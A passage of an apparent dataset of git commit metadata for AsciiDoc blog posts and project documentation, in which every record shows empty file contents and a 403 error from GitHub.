Camera...","message":"y2b create post They Call It The Hover Camera...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-19-They-Call-It-The-Hover-Camera.adoc","new_file":"_posts\/2016-10-19-They-Call-It-The-Hover-Camera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"194a3f9d6b3d8957b9a942cdb734e4bad4c1ed33","subject":"adding place holder for Mesos","message":"adding place holder for Mesos\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-mesos.adoc","new_file":"chapters\/docker-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b98117c0e75b3a8f2f3d289f5159722e48ea36a","subject":"y2b create post It's Like Candy For Your Eyeballs...","message":"y2b create post It's Like Candy For Your Eyeballs...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-27-Its-Like-Candy-For-Your-Eyeballs.adoc","new_file":"_posts\/2017-07-27-Its-Like-Candy-For-Your-Eyeballs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4a6f8de8be8b94fd463248896bb67d55d75e537","subject":"y2b create post The $12 Smart Watch - Does It Suck?","message":"y2b create post The $12 Smart Watch - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-07-The-12-Smart-Watch--Does-It-Suck.adoc","new_file":"_posts\/2017-12-07-The-12-Smart-Watch--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef5bc83e4b6fb79af6d2f689e02758e48caac12a","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bad7960fc4f0ac19cee1c8d1ee70f7cf00e8ffb","subject":"y2b create post $10 Wireless Earbuds - Bargain or Bust?","message":"y2b create post $10 Wireless Earbuds - Bargain or Bust?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-27-10-Wireless-Earbuds--Bargain-or-Bust.adoc","new_file":"_posts\/2017-06-27-10-Wireless-Earbuds--Bargain-or-Bust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65f2573b5bd057b514dce60bd86a4f5db56ad0ad","subject":"Update 2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","message":"Update 2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","new_file":"_posts\/2015-04-14-How-do-I-fix-the-GPG-error-NO_PUBKEY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6c64a048d87fd2d7dd66fab34ca471afc6906fe","subject":"Remove redundant 'minimum_should_match'","message":"Remove redundant 'minimum_should_match'\n\nRelates #31600","repos":"uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/query-dsl\/common-terms-query.asciidoc","new_file":"docs\/reference\/query-dsl\/common-terms-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f16d0a09289c140a9bf3c5d16a86cdfed6572d9","subject":"Add rationale.","message":"Add rationale.\n","repos":"tcsavage\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats,alesguzik\/cats,yurrriq\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dddb534c2ccb08a43c1efd66dd9520894eabea7f","subject":"Minor improvements on the documentation.","message":"Minor improvements on the documentation.\n","repos":"tcsavage\/cats,yurrriq\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"eddb64785ac620264d7a76be40affee9686faf1c","subject":"OGM-1017 Fix documentation typo","message":"OGM-1017 Fix documentation typo\n","repos":"DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,Sanne\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/cassandra.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/cassandra.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"d28fd26081a85807156ea17a36d1771f3ee86ba2","subject":"Update 2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","message":"Update 2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","repos":"murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io","old_file":"_posts\/2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","new_file":"_posts\/2017-10-20-Os-sinais-da-verdadeira-religiao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/murilo140891\/murilo140891.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a470150292faf463d109c998ec61a5f9066a6d","subject":"Update 2015-05-09-Estructuras-de-Control-Break-Continue.adoc","message":"Update 2015-05-09-Estructuras-de-Control-Break-Continue.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-09-Estructuras-de-Control-Break-Continue.adoc","new_file":"_posts\/2015-05-09-Estructuras-de-Control-Break-Continue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Wurser\/wurser.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6be13197ba0de47290930a67d502cc93093e1c6e","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a79d9afa059b4b7e9147a411561703f591dc0f0a","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"408ce72f16063664bf2c7a2db857e4d891acb438","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c6b470fef64511b6d48331aaef221b7b63b03cb","subject":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af23082e617f69fd9709b08ecef28c01ec016655","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7544e60fc68d7e8c7b48c8296cef415ed6bd58ba","subject":"Publish 2016-08-20.adoc","message":"Publish 2016-08-20.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"2016-08-20.adoc","new_file":"2016-08-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b3d832e5049cb7f7b15e1109e3d6e95f83175e","subject":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce8d92b626b6b3a21fe4be131a64e0c641797c4a","subject":"y2b create post DON'T Buy A Wireless Speaker Without Watching This...","message":"y2b create post DON'T Buy A Wireless Speaker Without Watching This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-28-DONT-Buy-A-Wireless-Speaker-Without-Watching-This.adoc","new_file":"_posts\/2017-10-28-DONT-Buy-A-Wireless-Speaker-Without-Watching-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"027c005db09bebbd347502b6af1d37e17d2ff6e1","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24b4093cf4d571b6a23eb31baa80e30075b32e11","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d09a2526fdd0924b192c53cd09fcb0a56320707","subject":"y2b create post Will This Be Your First Robot?","message":"y2b create post Will This Be Your First Robot?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-21-Will-This-Be-Your-First-Robot.adoc","new_file":"_posts\/2016-10-21-Will-This-Be-Your-First-Robot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6436339667576dfc651556771a3e47fa81e4efe5","subject":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","message":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6c89c382b2447f4de50340f2ffa5968bae99361","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4b41f9c2a3b8294fe1042eeacf6fea03c7ac8c","subject":"CAMEL-10559: maven plugin to validate using the route parser. Donated from fabric8 project.","message":"CAMEL-10559: maven plugin to validate using the route parser. Donated from fabric8 project.\n","repos":"curso007\/camel,Thopap\/camel,adessaigne\/camel,lburgazzoli\/camel,gilfernandes\/camel,yuruki\/camel,tdiesler\/camel,apache\/camel,objectiser\/camel,drsquidop\/camel,akhettar\/camel,tdiesler\/camel,sverkera\/camel,jamesnetherton\/camel,chirino\/camel,anton-k11\/camel,cunningt\/camel,sverkera\/camel,christophd\/camel,gautric\/camel,hqstevenson\/camel,mcollovati\/camel,sabre1041\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,snurmine\/camel,tadayosi\/camel,snurmine\/camel,sabre1041\/camel,veithen\/camel,gilfernandes\/camel,nboukhed\/camel,mgyongyosi\/camel,CodeSmell\/camel,lburgazzoli\/camel,christophd\/camel,davidkarlsen\/camel,tlehoux\/camel,zregvart\/camel,lburgazzoli\/camel,apache\/camel,w4tson\/camel,gilfernandes\/camel,RohanHart\/camel,jamesnetherton\/camel,davidkarlsen\/camel,Fabryprog\/camel,NickCis\/camel,pax95\/camel,CodeSmell\/camel,pmoerenhout\/camel,RohanHart\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,objectiser\/camel,anton-k11\/camel,tadayosi\/camel,Fabryprog\/camel,jkorab\/camel,pkletsko\/camel,nboukhed\/camel,punkhorn\/camel-upstream,kevinearls\/camel,jkorab\/camel,rmarting\/camel,ullgren\/camel,gautric\/camel,rmarting\/camel,veithen\/camel,sverkera\/camel,prashant2402\/camel,DariusX\/camel,apache\/camel,rmarting\/camel,anton-k11\/camel,lburgazzoli\/apache-camel,gautric\/camel,lburgazzoli\/apache-camel,yuruki\/camel,hqstevenson\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,hqstevenson\/camel,ssharma\/camel,RohanHart\/camel,kevinearls\/camel,NickCis\/camel,sverkera\/camel,hqstevenson\/camel,veithen\/camel,cunningt\/camel,mcollovati\/camel,prashant2402\/camel,punkhorn\/camel-upstream,gnodet\/camel,christophd\/camel,chirino\/camel,nicolaferraro\/camel,isavin\/camel,ullgren\/camel,isavin\/camel,hqstevenson\/camel,pkletsko\/camel,pkletsko\/camel,prashant2402\/camel,scranton\/camel,mgyongyosi\/camel,w4tson\/camel,lburgazzoli\/apache-camel,kevinearls\/camel,nboukhed\/camel,cunningt\/camel,mcollovati\/camel,jonmcewen\/camel,zregvart\/camel,adessaigne\/camel,chirino\/camel,nboukhed\/camel,driseley\/camel,tlehoux\/camel,allancth\/camel,jonmcewen\/camel,tlehoux\/camel,curso007\/camel,scranton\/camel,pmoerenhout\/camel,gnodet\/camel,gnodet\/camel,chirino\/camel,yuruki\/camel,apache\/camel,driseley\/camel,tadayosi\/camel,alvinkwekel\/camel,adessaigne\/camel,NickCis\/camel,objectiser\/camel,rmarting\/camel,akhettar\/camel,driseley\/camel,davidkarlsen\/camel,akhettar\/camel,davidkarlsen\/camel,pkletsko\/camel,tlehoux\/camel,anton-k11\/camel,onders86\/camel,tdiesler\/camel,sverkera\/camel,jamesnetherton\/camel,mgyongyosi\/camel,sverkera\/camel,snurmine\/camel,akhettar\/camel,allancth\/camel,kevinearls\/camel,tlehoux\/camel,christophd\/camel,drsquidop\/camel,nboukhed\/camel,ullgren\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,tadayosi\/camel,nikhilvibhav\/camel,driseley\/camel,gautric\/camel,CodeSmell\/camel,chirino\/camel,scranton\/camel,adessaigne\/camel,salikjan\/camel,lburgazzoli\/apache-camel,snurmine\/camel,veithen\/camel,rmarting\/camel,acartapanis\/camel,yuruki\/camel,tdiesler\/camel,lburgazzoli\/camel,prashant2402\/camel,sabre1041\/camel,ssharma\/camel,RohanHart\/camel,dmvolod\/camel,gilfernandes\/camel,onders86\/camel,NickCis\/camel,pax95\/camel,anoordover\/camel,alvinkwekel\/camel,jonmcewen\/camel,adessaigne\/camel,ssharma\/camel,drsquidop\/camel,lburgazzoli\/camel,scranton\/camel,driseley\/camel,apache\/camel,dmvolod\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,allancth\/camel,drsquidop\/camel,Thopap\/camel,allancth\/camel,acartapanis\/camel,kevinearls\/camel,CodeSmell\/camel,anton-k11\/camel,anoordover\/camel,dmvolod\/camel,alvinkwekel\/camel,w4tson\/camel,curso007\/camel,Thopap\/camel,apache\/camel,acartapanis\/camel,DariusX\/camel,jkorab\/camel,akhettar\/camel,RohanHart\/camel,drsquidop\/camel,zregvart\/camel,cunningt\/camel,christophd\/camel,drsquidop\/camel,isavin\/camel,mgyongyosi\/camel,jkorab\/camel,sabre1041\/camel,mcollovati\/camel,lburgazzoli\/camel,christophd\/camel,isavin\/camel,jonmcewen\/camel,anoordover\/camel,Thopap\/camel,gilfernandes\/camel,ullgren\/camel,Thopap\/camel,nikhilvibhav\/camel,pkletsko\/camel,anton-k11\/camel,nicolaferraro\/camel,pax95\/camel,tlehoux\/camel,nboukhed\/camel,kevinearls\/camel,onders86\/camel,acartapanis\/camel,scranton\/camel,Fabryprog\/camel,yuruki\/camel,DariusX\/camel,cunningt\/camel,objectiser\/camel,anoordover\/camel,prashant2402\/camel,anoordover\/camel,veithen\/camel,pax95\/camel,gnodet\/camel,NickCis\/camel,gautric\/camel,veithen\/camel,jkorab\/camel,alvinkwekel\/camel,NickCis\/camel,salikjan\/camel,punkhorn\/camel-upstream,sabre1041\/camel,nicolaferraro\/camel,tdiesler\/camel,RohanHart\/camel,pmoerenhout\/camel,pax95\/camel,Thopap\/camel,jamesnetherton\/camel,allancth\/camel,ssharma\/camel,gilfernandes\/camel,gautric\/camel,DariusX\/camel,dmvolod\/camel,tadayosi\/camel,pmoerenhout\/camel,jkorab\/camel,gnodet\/camel,curso007\/camel,zregvart\/camel,snurmine\/camel,pkletsko\/camel,onders86\/camel,anoordover\/camel,w4tson\/camel,Fabryprog\/camel,w4tson\/camel,w4tson\/camel,pmoerenhout\/camel,curso007\/camel,prashant2402\/camel,nikhilvibhav\/camel,jonmcewen\/camel,jonmcewen\/camel,curso007\/camel,dmvolod\/camel,chirino\/camel,punkhorn\/camel-upstream,sabre1041\/camel,mgyongyosi\/camel,dmvolod\/camel,jamesnetherton\/camel,pax95\/camel,hqstevenson\/camel,scranton\/camel,cunningt\/camel,allancth\/camel,isavin\/camel,rmarting\/camel,akhettar\/camel,isavin\/camel,driseley\/camel,acartapanis\/camel,onders86\/camel,tdiesler\/camel,yuruki\/camel,ssharma\/camel,ssharma\/camel","old_file":"tooling\/maven\/camel-maven-plugin\/src\/main\/docs\/camel-maven-plugin.adoc","new_file":"tooling\/maven\/camel-maven-plugin\/src\/main\/docs\/camel-maven-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a97784a9bb4b4e6eeabea12ac39e666fadce543c","subject":"End of year doc (2021)","message":"End of year doc (2021)\n\n#5792\n","repos":"khartec\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,khartec\/waltz,davidwatkins73\/waltz-dev","old_file":"docs\/plans\/2021-year-end.adoc","new_file":"docs\/plans\/2021-year-end.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c480a58607ad3b13c45ba0db031f3aa298bba2e0","subject":"release notes: add prior notes for 1.9.0","message":"release notes: add prior notes for 1.9.0\n\nChange-Id: Ib3acd021ae7e777c6f8cd6384247aea941b5c293\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12737\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/prior_release_notes.adoc","new_file":"docs\/prior_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fab38acacac1620f6b4666e1d2dda10de97f70d2","subject":"y2b create post It Has Double The Battery of iPhone X","message":"y2b create post It Has Double The Battery of iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-28-ItHasDoubleTheBatteryofiPhoneX.adoc","new_file":"_posts\/2018-01-28-ItHasDoubleTheBatteryofiPhoneX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb8fa041c7fa5292c947e351e9ea176d592447df","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a28d4426a813bb945db9d270863be51706bb5c7","subject":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-An-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 